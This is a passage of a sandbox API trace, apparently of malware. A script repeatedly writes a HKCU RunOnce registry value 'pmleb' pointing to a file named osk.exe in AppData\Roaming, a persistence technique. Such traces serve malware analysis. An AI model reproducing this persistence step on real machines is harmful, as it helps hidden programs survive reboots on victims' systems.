rgDispId=0x33f0d0*=0) returned 0x0 [0080.830] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x15 [0080.831] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.831] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x14 [0080.831] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.832] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.832] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.832] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.832] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.832] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, 
lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.832] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.832] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.832] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.832] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.832] RegCloseKey (hKey=0x280) returned 0x0 [0080.832] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.833] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.833] SetTimer (hWnd=0x20280, nIDEvent=0x2090, uElapse=0xa, lpTimerFunc=0x0) returned 0x2090 [0080.833] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.845] TranslateMessage 
(lpMsg=0x33f7fc) returned 0 [0080.845] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.845] KillTimer (hWnd=0x20280, uIDEvent=0x2090) returned 1 [0080.845] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.845] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.845] IUnknown:Release (This=0x787518) returned 0x1 [0080.845] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.845] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.845] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.846] FileSystemObject:IUnknown:Release 
(This=0x2b53a00) returned 0x1 [0080.846] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.846] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.846] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.846] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.846] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.846] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x15 [0080.846] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.846] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x16 [0080.846] FileSystemObject:IDispatch:Invoke 
(in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.847] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x15 [0080.847] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.847] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.847] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.847] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.847] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.847] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) 
returned 61 [0080.847] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.847] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.848] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.848] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.848] RegCloseKey (hKey=0x280) returned 0x0 [0080.848] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.848] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.848] SetTimer (hWnd=0x20280, nIDEvent=0x2091, uElapse=0xa, lpTimerFunc=0x0) returned 0x2091 [0080.848] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.860] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.860] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.861] KillTimer (hWnd=0x20280, uIDEvent=0x2091) returned 1 
[0080.861] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.861] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.861] IUnknown:Release (This=0x787518) returned 0x1 [0080.861] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.861] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.861] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.861] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.861] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, 
Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.861] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.862] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.862] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.862] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.862] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x16 [0080.862] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.862] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x17 [0080.862] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, 
[6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.863] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x16 [0080.863] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.863] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.863] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.863] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.863] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.863] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.863] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.863] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.864] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.864] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.864] RegCloseKey (hKey=0x280) returned 0x0 [0080.864] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.864] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.864] SetTimer (hWnd=0x20280, nIDEvent=0x2092, uElapse=0xa, lpTimerFunc=0x0) returned 0x2092 [0080.864] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.876] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.876] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.876] KillTimer (hWnd=0x20280, uIDEvent=0x2092) returned 1 [0080.876] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.876] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, 
Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.876] IUnknown:Release (This=0x787518) returned 0x1 [0080.876] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.877] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.877] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.877] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.877] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) 
returned 0x80004002 [0080.877] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.877] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.877] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.877] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, 